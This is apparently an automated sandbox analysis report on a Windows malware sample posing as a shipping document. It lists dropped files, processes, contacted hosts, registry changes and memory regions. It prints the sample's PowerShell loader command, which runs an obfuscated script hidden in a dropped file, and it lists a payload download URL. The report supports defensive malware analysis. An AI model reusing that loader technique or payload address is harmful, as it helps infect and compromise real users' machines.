Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Shipping documents 000309498585956000797900.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jbxwh01.chs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qoe1livw.2w1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Cosmopolitanising.col
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Prefaces.Jal
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\bevidstheds.cir
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\formellommeregneren.jul
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\noncomputation.ove
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\sedulousness.hal
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\subjects.pos
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\villagy.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
|
"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://api.ipify.org/
|
104.26.13.205
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://api.ipify.org
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://ftp.concaribe.com
|
unknown
|
||
|
http://concaribe.com
|
unknown
|
||
|
http://nsis.sf.net/NSIS_Error...
|
unknown
|
||
|
https://api.ipify.org/t
|
unknown
|
||
|
http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.bin~
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.bin
|
84.38.133.140
|
||
|
http://crl.m$
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
concaribe.com
|
192.185.13.234
|
|
|
|
ftp.concaribe.com
|
unknown
|
|
|
|
api.ipify.org
|
104.26.13.205
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.185.13.234
|
concaribe.com
|
United States
|
|
|
|
84.38.133.140
|
unknown
|
Latvia
|
||
|
104.26.13.205
|
api.ipify.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\interspeaker\Uninstall\Stationsbyerne62
|
insolubleness
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
24C31000
|
trusted library allocation
|
page read and write
|
|
|
|
24C59000
|
trusted library allocation
|
page read and write
|
|
|
|
C87B000
|
direct allocation
|
page execute and read and write
|
|
|
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
2708C000
|
heap
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
4560000
|
heap
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
571000
|
heap
|
page read and write
|
||
|
75E000
|
unkown
|
page read and write
|
||
|
45C0000
|
trusted library allocation
|
page read and write
|
||
|
6FF0000
|
heap
|
page read and write
|
||
|
6EA0000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
27980000
|
trusted library allocation
|
page execute and read and write
|
||
|
51F000
|
unkown
|
page read and write
|
||
|
7F40000
|
heap
|
page read and write
|
||
|
27B7F000
|
stack
|
page read and write
|
||
|
2708F000
|
heap
|
page read and write
|
||
|
7EC0000
|
trusted library allocation
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
352000
|
trusted library allocation
|
page read and write
|
||
|
73472000
|
unkown
|
page readonly
|
||
|
45D2000
|
trusted library allocation
|
page read and write
|
||
|
27A90000
|
trusted library allocation
|
page read and write
|
||
|
7DCE000
|
stack
|
page read and write
|
||
|
73470000
|
unkown
|
page readonly
|
||
|
70D3000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
59CE000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
24C16000
|
trusted library allocation
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
2840000
|
direct allocation
|
page read and write
|
||
|
73471000
|
unkown
|
page execute read
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
24C2D000
|
trusted library allocation
|
page read and write
|
||
|
7E0E000
|
stack
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
26BF0000
|
trusted library allocation
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
5866000
|
trusted library allocation
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
350000
|
trusted library allocation
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
703B000
|
heap
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
24BA6000
|
trusted library allocation
|
page read and write
|
||
|
330000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
40B000
|
unkown
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
8AD000
|
heap
|
page read and write
|
||
|
24BD0000
|
heap
|
page execute and read and write
|
||
|
528000
|
unkown
|
page read and write
|
||
|
2870000
|
direct allocation
|
page read and write
|
||
|
27C00000
|
trusted library allocation
|
page read and write
|
||
|
56D000
|
heap
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
81F5000
|
heap
|
page read and write
|
||
|
298A000
|
heap
|
page read and write
|
||
|
4731000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
24A1E000
|
stack
|
page read and write
|
||
|
362000
|
trusted library allocation
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
42E000
|
unkown
|
page read and write
|
||
|
3E7000
|
heap
|
page read and write
|
||
|
249DE000
|
stack
|
page read and write
|
||
|
24910000
|
direct allocation
|
page read and write
|
||
|
245C0000
|
heap
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
7E65000
|
trusted library allocation
|
page read and write
|
||
|
463E000
|
stack
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
24B8B000
|
trusted library allocation
|
page read and write
|
||
|
6E7E000
|
stack
|
page read and write
|
||
|
27D7E000
|
stack
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
direct allocation
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
26FC0000
|
heap
|
page read and write
|
||
|
45D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
87E000
|
stack
|
page read and write
|
||
|
8178000
|
heap
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
248AF000
|
stack
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
72C0000
|
trusted library allocation
|
page read and write
|
||
|
28C0000
|
direct allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
26FA0000
|
remote allocation
|
page read and write
|
||
|
26EDD000
|
stack
|
page read and write
|
||
|
432000
|
unkown
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27DBE000
|
stack
|
page read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
340000
|
trusted library allocation
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
702B000
|
heap
|
page read and write
|
||
|
27C20000
|
trusted library allocation
|
page read and write
|
||
|
40BC000
|
stack
|
page read and write
|
||
|
4AF000
|
unkown
|
page readonly
|
||
|
25C09000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2890000
|
direct allocation
|
page read and write
|
||
|
26EA0000
|
trusted library allocation
|
page read and write
|
||
|
2486E000
|
stack
|
page read and write
|
||
|
27C00000
|
trusted library allocation
|
page read and write
|
||
|
451000
|
unkown
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
86D000
|
heap
|
page read and write
|
||
|
27980000
|
trusted library allocation
|
page read and write
|
||
|
B47B000
|
direct allocation
|
page execute and read and write
|
||
|
27A7E000
|
stack
|
page read and write
|
||
|
2735E000
|
stack
|
page read and write
|
||
|
26BF0000
|
heap
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
513000
|
unkown
|
page read and write
|
||
|
27933000
|
trusted library allocation
|
page read and write
|
||
|
D27B000
|
direct allocation
|
page execute and read and write
|
||
|
24900000
|
direct allocation
|
page read and write
|
||
|
7004000
|
heap
|
page read and write
|
||
|
45CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
8150000
|
heap
|
page read and write
|
||
|
4640000
|
heap
|
page execute and read and write
|
||
|
2797D000
|
stack
|
page read and write
|
||
|
81B1000
|
heap
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
81F1000
|
heap
|
page read and write
|
||
|
27A87000
|
trusted library allocation
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page read and write
|
||
|
83C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27970000
|
trusted library allocation
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page execute and read and write
|
||
|
27970000
|
trusted library allocation
|
page read and write
|
||
|
760000
|
direct allocation
|
page read and write
|
||
|
8EEB000
|
remote allocation
|
page execute and read and write
|
||
|
27C30000
|
trusted library allocation
|
page read and write
|
||
|
6E3E000
|
stack
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
26D2C000
|
stack
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
516000
|
unkown
|
page read and write
|
||
|
26F1F000
|
stack
|
page read and write
|
||
|
33D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27A3E000
|
stack
|
page read and write
|
||
|
24AC8000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
2495A000
|
stack
|
page read and write
|
||
|
409000
|
unkown
|
page readonly
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
24C1F000
|
trusted library allocation
|
page read and write
|
||
|
2737D000
|
trusted library allocation
|
page read and write
|
||
|
24B9A000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
26FC3000
|
heap
|
page read and write
|
||
|
81FD000
|
heap
|
page read and write
|
||
|
2730000
|
heap
|
page read and write
|
||
|
4A6000
|
unkown
|
page readonly
|
||
|
7FA000
|
heap
|
page read and write
|
||
|
57D000
|
heap
|
page read and write
|
||
|
8C4000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27036000
|
heap
|
page read and write
|
||
|
67B0000
|
heap
|
page execute and read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
67FE000
|
stack
|
page read and write
|
||
|
27BBE000
|
stack
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
2240000
|
heap
|
page read and write
|
||
|
41BE000
|
stack
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
4CAB000
|
trusted library allocation
|
page read and write
|
||
|
26DAE000
|
stack
|
page read and write
|
||
|
8B1000
|
heap
|
page read and write
|
||
|
4690000
|
heap
|
page readonly
|
||
|
815C000
|
heap
|
page read and write
|
||
|
27A90000
|
trusted library allocation
|
page read and write
|
||
|
68BE000
|
stack
|
page read and write
|
||
|
84EB000
|
remote allocation
|
page execute and read and write
|
||
|
267C000
|
stack
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
674D000
|
stack
|
page read and write
|
||
|
2850000
|
direct allocation
|
page read and write
|
||
|
279B0000
|
trusted library allocation
|
page read and write
|
||
|
2737D000
|
trusted library allocation
|
page read and write
|
||
|
2880000
|
heap
|
page read and write
|
||
|
268F000
|
stack
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
45B0000
|
trusted library allocation
|
page read and write
|
||
|
24790000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
2766000
|
heap
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
73BB000
|
stack
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
24A20000
|
heap
|
page read and write
|
||
|
27C40000
|
trusted library allocation
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
687E000
|
stack
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
247DE000
|
stack
|
page read and write
|
||
|
26DC0000
|
heap
|
page read and write
|
||
|
45A0000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
8C7B000
|
direct allocation
|
page execute and read and write
|
||
|
7370000
|
trusted library allocation
|
page execute and read and write
|
||
|
36B000
|
trusted library allocation
|
page execute and read and write
|
||
|
DC7B000
|
direct allocation
|
page execute and read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
56D1000
|
trusted library allocation
|
page read and write
|
||
|
69A0000
|
direct allocation
|
page read and write
|
||
|
566000
|
heap
|
page read and write
|
||
|
4B9000
|
unkown
|
page readonly
|
||
|
43F000
|
unkown
|
page read and write
|
||
|
56A000
|
heap
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
21BE000
|
stack
|
page read and write
|
||
|
27980000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
806C000
|
stack
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
70EB000
|
remote allocation
|
page execute and read and write
|
||
|
27C00000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
4A6000
|
unkown
|
page readonly
|
||
|
2244000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
4BC000
|
unkown
|
page readonly
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
27C20000
|
trusted library allocation
|
page read and write
|
||
|
73E000
|
stack
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
2481F000
|
stack
|
page read and write
|
||
|
2880000
|
direct allocation
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page read and write
|
||
|
29C3000
|
heap
|
page read and write
|
||
|
571000
|
heap
|
page read and write
|
||
|
24260000
|
direct allocation
|
page read and write
|
||
|
8130000
|
heap
|
page read and write
|
||
|
7100000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
35A000
|
trusted library allocation
|
page execute and read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
24BB2000
|
trusted library allocation
|
page read and write
|
||
|
26D6C000
|
stack
|
page read and write
|
||
|
4CA3000
|
trusted library allocation
|
page read and write
|
||
|
279D0000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27980000
|
trusted library allocation
|
page read and write
|
||
|
46D1000
|
trusted library allocation
|
page read and write
|
||
|
2900000
|
direct allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
2958000
|
heap
|
page read and write
|
||
|
8D2000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
27960000
|
trusted library allocation
|
page read and write
|
||
|
27970000
|
trusted library allocation
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
81C8000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
6760000
|
trusted library allocation
|
page read and write
|
||
|
7120000
|
trusted library allocation
|
page read and write
|
||
|
73474000
|
unkown
|
page readonly
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
701E000
|
heap
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
24240000
|
direct allocation
|
page read and write
|
||
|
279A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AF000
|
unkown
|
page readonly
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
26B8000
|
stack
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
29C6000
|
heap
|
page read and write
|
||
|
7ED0000
|
trusted library allocation
|
page read and write
|
||
|
7D47000
|
stack
|
page read and write
|
||
|
27990000
|
trusted library allocation
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
4CA5000
|
trusted library allocation
|
page read and write
|
||
|
7001000
|
heap
|
page read and write
|
||
|
8182000
|
heap
|
page read and write
|
||
|
8B50000
|
direct allocation
|
page execute and read and write
|
||
|
24B8E000
|
trusted library allocation
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
27C20000
|
trusted library allocation
|
page read and write
|
||
|
26FA0000
|
remote allocation
|
page read and write
|
||
|
52EB000
|
remote allocation
|
page execute and read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
28D0000
|
direct allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
83F000
|
stack
|
page read and write
|
||
|
83D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
334000
|
trusted library allocation
|
page read and write
|
||
|
27373000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
2860000
|
direct allocation
|
page read and write
|
||
|
81DB000
|
heap
|
page read and write
|
||
|
7110000
|
trusted library allocation
|
page read and write
|
||
|
66EB000
|
remote allocation
|
page execute and read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
7160000
|
trusted library allocation
|
page read and write
|
||
|
46A8000
|
trusted library allocation
|
page read and write
|
||
|
6FC7000
|
trusted library allocation
|
page read and write
|
||
|
27A90000
|
trusted library allocation
|
page read and write
|
||
|
27942000
|
trusted library allocation
|
page read and write
|
||
|
24A6C000
|
stack
|
page read and write
|
||
|
26F5E000
|
stack
|
page read and write
|
||
|
27360000
|
trusted library allocation
|
page read and write
|
||
|
2469E000
|
stack
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
538000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
24C61000
|
trusted library allocation
|
page read and write
|
||
|
8166000
|
heap
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
25BE1000
|
trusted library allocation
|
page read and write
|
||
|
45A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
70BA000
|
heap
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
7E10000
|
heap
|
page read and write
|
||
|
2461E000
|
stack
|
page read and write
|
||
|
24BC0000
|
trusted library allocation
|
page read and write
|
||
|
468E000
|
stack
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
27937000
|
trusted library allocation
|
page read and write
|
||
|
71BE000
|
stack
|
page read and write
|
||
|
525000
|
unkown
|
page read and write
|
||
|
7F990000
|
trusted library allocation
|
page execute and read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
770000
|
direct allocation
|
page read and write
|
||
|
858000
|
heap
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
27099000
|
heap
|
page read and write
|
||
|
27980000
|
trusted library allocation
|
page read and write
|
||
|
51C000
|
unkown
|
page read and write
|
||
|
28A0000
|
direct allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
87A000
|
heap
|
page read and write
|
||
|
A07B000
|
direct allocation
|
page execute and read and write
|
||
|
24220000
|
direct allocation
|
page read and write
|
||
|
279C0000
|
trusted library allocation
|
page read and write
|
||
|
27980000
|
trusted library allocation
|
page read and write
|
||
|
45B9000
|
trusted library allocation
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
68FE000
|
stack
|
page read and write
|
||
|
27360000
|
trusted library allocation
|
page read and write
|
||
|
34D000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F9E000
|
stack
|
page read and write
|
||
|
24B9E000
|
trusted library allocation
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
45AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
27990000
|
trusted library allocation
|
page read and write
|
||
|
29CF000
|
heap
|
page read and write
|
||
|
6D00000
|
heap
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
8CE000
|
heap
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
8B6000
|
heap
|
page read and write
|
||
|
727D000
|
stack
|
page read and write
|
||
|
2D90000
|
trusted library allocation
|
page read and write
|
||
|
2707E000
|
heap
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
967B000
|
direct allocation
|
page execute and read and write
|
||
|
27967000
|
trusted library allocation
|
page read and write
|
||
|
26E5E000
|
stack
|
page read and write
|
||
|
27A90000
|
trusted library allocation
|
page read and write
|
||
|
365000
|
trusted library allocation
|
page execute and read and write
|
||
|
24210000
|
direct allocation
|
page read and write
|
||
|
B30000
|
direct allocation
|
page read and write
|
||
|
4070000
|
heap
|
page read and write
|
||
|
787000
|
heap
|
page read and write
|
||
|
26E9D000
|
stack
|
page read and write
|
||
|
706F000
|
heap
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
26FC8000
|
heap
|
page read and write
|
||
|
26FD0000
|
heap
|
page read and write
|
||
|
27C40000
|
trusted library allocation
|
page read and write
|
||
|
2471E000
|
stack
|
page read and write
|
||
|
70E0000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
2C08000
|
heap
|
page read and write
|
||
|
27A90000
|
trusted library allocation
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
27368000
|
trusted library allocation
|
page read and write
|
||
|
587F000
|
trusted library allocation
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
26DB0000
|
heap
|
page read and write
|
||
|
7CE000
|
unkown
|
page read and write
|
||
|
24230000
|
direct allocation
|
page read and write
|
||
|
574000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
2BE7000
|
heap
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
494000
|
unkown
|
page readonly
